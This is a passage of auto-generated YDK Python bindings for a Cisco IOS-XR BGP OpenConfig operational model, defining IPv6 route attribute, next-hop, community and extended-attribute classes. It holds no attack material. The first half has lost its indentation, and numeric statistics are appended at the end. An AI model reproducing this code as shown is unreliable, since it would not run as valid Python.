super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "prefix-name"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
# Restrict writes to the declared leafs via the YDK base helper.
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
# Deferred import of the generated meta table.
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix']['meta_info']
@staticmethod
def _meta_info():
# Deferred import of the generated meta table (PrefixName entry).
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName']['meta_info']
class RouteAttrList(_Entity_):
"""
RouteAttributesList

Read-only container for the route's standard BGP path attributes:
origin, AS path(s), MED, local preference, atomic-aggregate flag,
plus child containers for next-hop, aggregator, and a list of
community values.

.. attribute:: next_hop
NextHopAddress
**type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop>`
**config**\: False
.. attribute:: aggregrator_attributes
AggregatorList
**type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes>`
**config**\: False
.. attribute:: origin_type
Origin Attribute Type
**type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`
**config**\: False
.. attribute:: as_path
AS Path
**type**\: str
**config**\: False
.. attribute:: as4_path
AS4 Path
**type**\: str
**config**\: False
.. attribute:: med
Med
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: local_pref
LocalPref
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: atomic_aggr
AtomicAggr
**type**\: bool
**config**\: False
.. attribute:: community
CommunityArray
**type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2/3 compatible superclass initialization.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList, self).__init__()
self.yang_name = "route-attr-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
# Child map: YANG child name -> (python attribute name, child class).
self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community))])
self._leafs = OrderedDict([
('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
('med', (YLeaf(YType.uint32, 'med'), ['int'])),
('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
])
self.origin_type = None
self.as_path = None
self.as4_path = None
self.med = None
self.local_pref = None
self.atomic_aggr = None
# Wire up the singleton child containers; 'community' is a YList.
self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop()
self.next_hop.parent = self
self._children_name_map["next_hop"] = "next-hop"
self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes()
self.aggregrator_attributes.parent = self
self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
self.community = YList(self)
self._segment_path = lambda: "route-attr-list"
self._is_frozen = True
def __setattr__(self, name, value):
# Validate writes against the declared leaf names via the base helper.
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)
class NextHop(_Entity_):
"""
NextHopAddress

Next-hop address: AFI discriminator plus IPv4 and IPv6 address leafs.

.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2/3 compatible superclass initialization.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop, self).__init__()
self.yang_name = "next-hop"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "next-hop"
self._is_frozen = True
def __setattr__(self, name, value):
# Restrict writes to the declared leafs via the YDK base helper.
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
# Deferred import of the generated meta table.
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop']['meta_info']
class AggregratorAttributes(_Entity_):
"""
AggregatorList

BGP AGGREGATOR attribute: 2-byte and 4-byte AS numbers plus the
aggregator's IPv4 address. NOTE: the "Aggregrator" misspelling comes
from the YANG model and is part of the public class name.

.. attribute:: as_
AS number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: as4
AS4 number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2/3 compatible superclass initialization.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()
self.yang_name = "aggregrator-attributes"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
# 'as_' (trailing underscore) avoids shadowing the python keyword 'as';
# the YANG leaf name is plain 'as'.
self._leafs = OrderedDict([
('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
('address', (YLeaf(YType.str, 'address'), ['str'])),
])
self.as_ = None
self.as4 = None
self.address = None
self._segment_path = lambda: "aggregrator-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
# Restrict writes to the declared leafs via the YDK base helper.
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)
@staticmethod
def _meta_info():
# Deferred import of the generated meta table.
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']
class Community(_Entity_):
"""
CommunityArray

One community value, exposed as a single string leaf 'objects'.

.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2/3 compatible superclass initialization.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community, self).__init__()
self.yang_name = "community"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "community"
self._is_frozen = True
def __setattr__(self, name, value):
# Restrict writes to the declared leaf via the YDK base helper.
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community, ['objects'], name, value)
@staticmethod
def _meta_info():
# Deferred import of the generated meta table.
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community']['meta_info']
@staticmethod
def _meta_info():
# Deferred import of the generated meta table (RouteAttrList entry).
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList']['meta_info']
class ExtAttributesList(_Entity_):
"""
ExtAttributesList
.. attribute:: originator_id
OriginatorID
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: aigp
AIGP
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: path_id
PathId
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: cluster
ClusterList
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ext_community
ExtendedCommunityArray
**type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity>`
**config**\: False
.. attribute:: unknown_attributes
UnknownAttributes
**type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Initialize the ext-attributes-list container: originator-id, AIGP,
# path-id, cluster-list leafs plus YLists of extended communities and
# unknown attributes.
# Python 2/3 compatible superclass initialization.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList, self).__init__()
self.yang_name = "ext-attributes-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
# Child map: YANG child name -> (python attribute name, child class).
self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes))])
# 'cluster' is a leaf-list (YLeafList), hence the python list default below.
self._leafs = OrderedDict([
('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
])
self.originator_id = None
self.aigp = None
self.path_id = None
self.cluster = []
self.ext_community = YList(self)
self.unknown_attributes = YList(self)
self._segment_path = lambda: "ext-attributes-list"
self._is_frozen = True
def __setattr__(self, name, value):
# Validate writes against the declared leaf names via the base helper.
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)
class ExtCommunity(_Entity_):
"""
ExtendedCommunityArray

One extended-community value, exposed as a single string leaf 'objects'.

.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2/3 compatible superclass initialization.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()
self.yang_name = "ext-community"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "ext-community"
self._is_frozen = True
def __setattr__(self, name, value):
# Restrict writes to the declared leaf via the YDK base helper.
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)
@staticmethod
def _meta_info():
# Deferred import of the generated meta table.
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']
class UnknownAttributes(_Entity_):
    """
    UnknownAttributes

    .. attribute:: attribute_type

        AttributeType

        **type**\: int

        **range:** 0..65535

        **config**\: False

    .. attribute:: attribute_length

        AttributeLength

        **type**\: int

        **range:** 0..65535

        **config**\: False

    .. attribute:: attribute_value

        AttributeValue

        **type**\: str

        **pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?

        **config**\: False

    """

    # YANG module metadata used by the YDK runtime.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3 compatible super() call; the full dotted path is
        # required under Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()

        self.yang_name = "unknown-attributes"
        self.yang_parent_name = "ext-attributes-list"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf registry must be populated before the leaf attributes are
        # assigned below, since __setattr__ consults it.
        self._leafs = OrderedDict([
            ('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
            ('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
            ('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
        ])
        self.attribute_type = None
        self.attribute_length = None
        self.attribute_value = None
        self._segment_path = lambda: "unknown-attributes"
        # Freeze last: after this, __setattr__ validates every assignment.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)

    @staticmethod
    def _meta_info():
        # Deferred import avoids loading the large meta module at import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info entry for ExtAttributesList."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList']
    return entry['meta_info']
class LastModifiedDate(_Entity_):
    """
    LastModifiedDate

    .. attribute:: time_value

        TimeValue

        **type**\: str

        **config**\: False

    """

    # YANG module metadata used by the YDK runtime.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3 compatible super() call; the full dotted path is
        # required under Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate, self).__init__()

        self.yang_name = "last-modified-date"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf registry must be populated before the leaf attribute is
        # assigned below, since __setattr__ consults it.
        self._leafs = OrderedDict([
            ('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
        ])
        self.time_value = None
        self._segment_path = lambda: "last-modified-date"
        # Freeze last: after this, __setattr__ validates every assignment.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate, ['time_value'], name, value)

    @staticmethod
    def _meta_info():
        # Deferred import avoids loading the large meta module at import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
    """
    LastUpdateRecieved

    .. attribute:: time_value

        TimeValue

        **type**\: str

        **config**\: False

    """
    # NOTE(review): the misspelling "Recieved" comes from the generated YANG
    # model and must be preserved — callers and the meta table use this name.

    # YANG module metadata used by the YDK runtime.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3 compatible super() call; the full dotted path is
        # required under Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved, self).__init__()

        self.yang_name = "last-update-recieved"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf registry must be populated before the leaf attribute is
        # assigned below, since __setattr__ consults it.
        self._leafs = OrderedDict([
            ('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
        ])
        self.time_value = None
        self._segment_path = lambda: "last-update-recieved"
        # Freeze last: after this, __setattr__ validates every assignment.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)

    @staticmethod
    def _meta_info():
        # Deferred import avoids loading the large meta module at import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info entry for Route."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info entry for Routes."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes']
    return entry['meta_info']
class NumRoutes(_Entity_):
    """
    Number of routes in adjacency rib out\-bound
    post\-policy table

    .. attribute:: num_routes

        NumRoutes

        **type**\: int

        **range:** 0..18446744073709551615

        **config**\: False

    """
    # NOTE(review): the docstring says "out-bound post-policy" but this
    # container's parent is "adj-rib-in-pre"; the text comes straight from
    # the YANG model description — confirm against the model source.

    # YANG module metadata used by the YDK runtime.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3 compatible super() call; the full dotted path is
        # required under Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes, self).__init__()

        self.yang_name = "num-routes"
        self.yang_parent_name = "adj-rib-in-pre"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf registry must be populated before the leaf attribute is
        # assigned below, since __setattr__ consults it.
        self._leafs = OrderedDict([
            ('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
        ])
        self.num_routes = None
        self._segment_path = lambda: "num-routes"
        # Freeze last: after this, __setattr__ validates every assignment.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes, ['num_routes'], name, value)

    @staticmethod
    def _meta_info():
        # Deferred import avoids loading the large meta module at import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info entry for AdjRibInPre."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info entry for OpenConfigNeighbor."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info entry for OpenConfigNeighbors."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info entry for Ipv6Unicast."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info entry for AfiSafiTable."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info entry for BgpRib."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp.BgpRib']
    return entry['meta_info']
def clone_ptr(self):
    """Create, cache, and return a fresh top-level OcBgp entity."""
    top = OcBgp()
    self._top_entity = top
    return self._top_entity
@staticmethod
def _meta_info():
    """Return the generated meta-info entry for OcBgp."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp']
    return entry['meta_info']
| 65.4329
| 905
| 0.365426
| 48,345
| 740,635
| 5.328162
| 0.005357
| 0.007935
| 0.08036
| 0.030281
| 0.99229
| 0.991203
| 0.990528
| 0.989006
